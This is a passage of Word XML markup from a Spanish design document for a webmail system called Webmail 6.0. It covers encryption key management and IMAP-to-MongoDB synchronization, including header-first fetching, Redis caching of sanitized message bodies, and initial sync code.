        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="151"/>
    <w:bookmarkStart w:id="152" w:name="key-management-env-dev-kms-producción"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.4.3 Key management: env dev, KMS producción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La gestión de claves de cifrado sigue el principio de separación de secretos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Desarrollo local:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La clave maestra se almacena en variable de entorno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ENCRYPTION_KEY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como hex string de 64 caracteres (32 bytes). El archivo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.env</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se incluye en</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.gitignore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con reglas estrictas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Producción:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La clave maestra se almacena en un Key Management Service (KMS) como AWS Secrets Manager, HashiCorp Vault o Azure Key Vault. El backend obtiene la clave en tiempo de arranque y la mantiene en memoria. Nunca se persiste en disco ni en logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Rotación de claves:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Cuando se rota la clave maestra, los registros existentes se descifran con la clave anterior y se recifran con la nueva. Este proceso opera como un job de fondo de baja prioridad en BullMQ para no impactar el servicio en producción.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Clave de encriptación de datos (DEK) vs clave de encriptación de claves (KEK):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">En configuraciones enterprise, se implementa envelope encryption: cada cuenta de usuario tiene su propia DEK generada aleatoriamente, y esta DEK se cifra con la KEK maestra almacenada en el KMS. Esto permite la rotación de la KEK sin recifrar todos los datos de usuario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[119]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="152"/>
    <w:bookmarkEnd w:id="153"/>
    <w:bookmarkEnd w:id="154"/>
    <w:bookmarkStart w:id="174" w:name="sincronización-imap-mongodb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10. Sincronización IMAP ↔ MongoDB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La eficiencia del motor de sincronización determina si un webmail se siente instantáneo o torpe. Gmail carga la bandeja de entrada en menos de un segundo para mailboxes de decenas de miles de mensajes porque nunca fetchea cuerpos completos en la carga inicial. Webmail 6.0 replica esta estrategia con un enfoque de tres capas: headers primero, cuerpo bajo demanda, y cache efímero para reducir latencia perceptible.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="158" w:name="X99d9d293874d24ea915ed43c415e7f053cf917c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1 Estrategia: Headers Primero, Body Bajo Demanda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El principio fundamental de la sincronización en Webmail 6.0 es la separación estricta entre metadata (headers, flags, tamaño) y contenido (cuerpo, adjuntos). Los headers constituyen aproximadamente el 0.5% del tamaño total de un correo promedio; fetchear solo headers permite construir una lista de mensajes completa órdenes de magnitud más rápido que descargar cada correo en su totalidad</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[75]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="155" w:name="body.peekheader.fields-rápido-no-marca"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1.1 BODY.PEEK[HEADER.FIELDS] — rápido, no marca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El comando IMAP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY.PEEK[HEADER.FIELDS (...)]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es la herramienta principal de la sincronización inicial. La variante</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">PEEK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es crítica porque no marca implícitamente el mensaje como leído (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">\Seen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) al fetchearlo, comportamiento que el flag</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sí activaría</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[70]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[78]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Un webmail que fetchea headers para mostrar una lista no debe alterar el estado de lectura de los correos.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los campos de header que Webmail 6.0 extrae son:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY.PEEK[HEADER.FIELDS (DATE SUBJECT FROM TO CC BCC REPLY-TO IN-REPLY-TO REFERENCES MESSAGE-ID CONTENT-TYPE X-PRIORITY X-MSMAIL-PRIORITY)]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Estos campos permiten: identificación única (Message-ID), threading (References, In-Reply-To), presentación de lista (From, Subject, Date), clasificación de prioridad, y detección de tipo de contenido. El campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">REFERENCES</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">es esencial para el algoritmo JWZ de threading, que opera construyendo un grafo de parent-child entre mensajes y luego ordenando conversaciones por fecha</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[56]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Outlook (cliente desktop) utiliza un patrón similar: fetchea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY.PEEK[HEADER]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">FLAGS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">RFC822.SIZE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">INTERNALDATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">como metadata para construir su lista local antes de descargar cuerpos bajo demanda</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[72]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="155"/>
    <w:bookmarkStart w:id="156" w:name="body-solo-al-abrir-redis-cache-1-hora"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1.2 Body solo al abrir → Redis cache 1 hora</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cuando el usuario abre un correo específico, el backend ejecuta un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">BODY.PEEK[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para obtener el cuerpo completo. Este proceso sigue el flujo: (1) verificar Redis cache por Message-ID; (2) en cache hit, retornar directamente; (3) en cache miss, fetchear vía IMAP, parsear con PostalMime, sanitizar HTML con DOMPurify, y almacenar en Redis con TTL de 1 hora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bodyKey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`email:body:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messageId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">let</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(bodyKey)</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body) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> fullMessage </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">fetchOne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(uid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">source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ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> PostalMime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">parse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(fullMessage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">source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sanitizedHtml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitizeEmailHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">textAsHtml</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body </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sanitizedHtml</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parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">text</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">attachments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> parsed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">attachments</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setex</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(bodyKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">3600</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(body))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// TTL 1 hora</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El TTL de 1 hora equilibra hit ratio (probabilidad de que el usuario reabra el correo poco después) con frescura de datos (si el correo se modifica en el servidor IMAP, el cache expira antes de que la inconsistencia sea problemática).</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="156"/>
    <w:bookmarkStart w:id="157" w:name="preview-texto-500-chars-para-búsqueda"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.1.3 Preview texto: 500 chars para búsqueda</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Para cada correo sincronizado, el backend extrae los primeros 500 caracteres del contenido texto plano y los almacena en MongoDB en el campo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">textPreview</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Este campo cumple dos funciones: proporciona una vista previa visible en la lista de correos sin necesidad de cargar el cuerpo completo, y actúa como target para búsquedas full-text cuando MongoDB Atlas Search no está disponible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La extracción de preview opera sobre el texto plano resultante del parsing MIME, no sobre el HTML sanitizado, para evitar que etiquetas residualmente visibles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;div&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">style=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) contaminen el texto de búsqueda.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="157"/>
    <w:bookmarkEnd w:id="158"/>
    <w:bookmarkStart w:id="161" w:name="sincronización-inicial"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2 Sincronización Inicial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La primera vez que un usuario vincula una cuenta IMAP, Webmail 6.0 ejecuta una sincronización completa que descarga los headers de todas las carpetas. Para una mailbox con 50.000 correos distribuidos en 15 carpetas, este proceso típicamente toma entre 30 y 120 segundos dependiendo de la latencia al servidor IMAP.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="159" w:name="Xe48be315f89447ef89d9f14c98e65688b455ec4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">10.2.1 FETCH headers todas carpetas → MongoDB batching</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El proceso de sincronización inicial opera carpeta por carpeta en secuencia paralela controlada:</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initialSync</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> accountId) {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> lock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> imapClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">getMailboxLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
